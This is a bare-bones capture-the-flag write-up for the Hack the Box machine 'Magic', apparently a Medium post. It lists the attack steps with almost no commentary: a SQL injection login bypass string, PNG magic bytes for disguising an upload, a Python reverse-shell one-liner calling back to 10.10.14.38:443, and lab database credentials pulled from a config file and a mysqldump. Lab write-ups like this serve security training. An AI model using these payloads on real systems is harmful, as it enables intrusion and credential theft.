Hack the Box: Magic

User

admin’ OR ‘a’=’a
0x89  0x50  0x4e  0x47  0x0d  0x0a  0x1a  0x0a
python3 -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘10.10.14.38’,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/sh’,’-i’]);”
$ cat db.php5
<?php
class Database
{
private static $dbName = ‘Magic’ ;
private static $dbHost = ‘localhost’ ;
private static $dbUsername = ‘theseus’;
private static $dbUserPassword = ‘iamkingtheseus’;
-- snip --
mysqldump -u theseus -p — all-databases
-- snip --
INSERT INTO `login` VALUES (1,’admin’,’Th3s3usW4sK1ng’);
-- snip --

Root

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

ABN AMRO Developer MeetUp with Bol.com

Platformer: Setting Player to Moving Platform

Parallel processing in PowerShell

Kanban & SAFe: An Agile Approach

Equal Play: How Hopscotch Uses Paste

Raising the sound and the standards bars

Number of Islands

P.L.U.R.N. — ing to Fly

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tellico Lungrevink

Tellico Lungrevink

More from Medium

TryHackMe: [Day 6] Web Exploitation Patch Management Is Hard

Tryhackme Daily Bugle

VulnHub — The Planets: Mercury CTF

TryHackme : Tech_Supp0rt: 1